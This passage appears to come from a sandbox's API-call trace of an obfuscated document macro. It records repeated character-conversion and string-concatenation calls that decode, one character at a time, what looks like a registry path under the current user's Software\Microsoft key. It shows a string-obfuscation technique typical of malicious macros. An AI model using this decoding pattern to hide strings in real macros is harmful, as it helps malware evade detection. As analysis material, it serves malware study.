lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0167.519] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.520] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.520] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.521] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0167.521] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.522] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.522] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.523] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.523] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.524] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.524] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.524] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0167.525] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.525] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0167.526] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.526] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0167.526] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.527] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0167.527] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.528] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.528] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.627] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.627] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.628] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.628] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.628] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.629] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.629] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.630] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.630] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.630] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.631] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0167.631] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.632] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.632] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.632] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0167.633] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.633] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0167.633] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.634] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.634] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.635] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.635] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.635] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.636] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.636] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0167.637] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.637] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.637] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.649] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0167.649] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.650] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.650] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.650] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.651] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.651] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.651] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.652] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.652] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.653] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0167.653] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.659] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.659] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.660] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.660] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.660] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0167.661] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.661] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.661] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.662] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.662] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.663] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.663] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 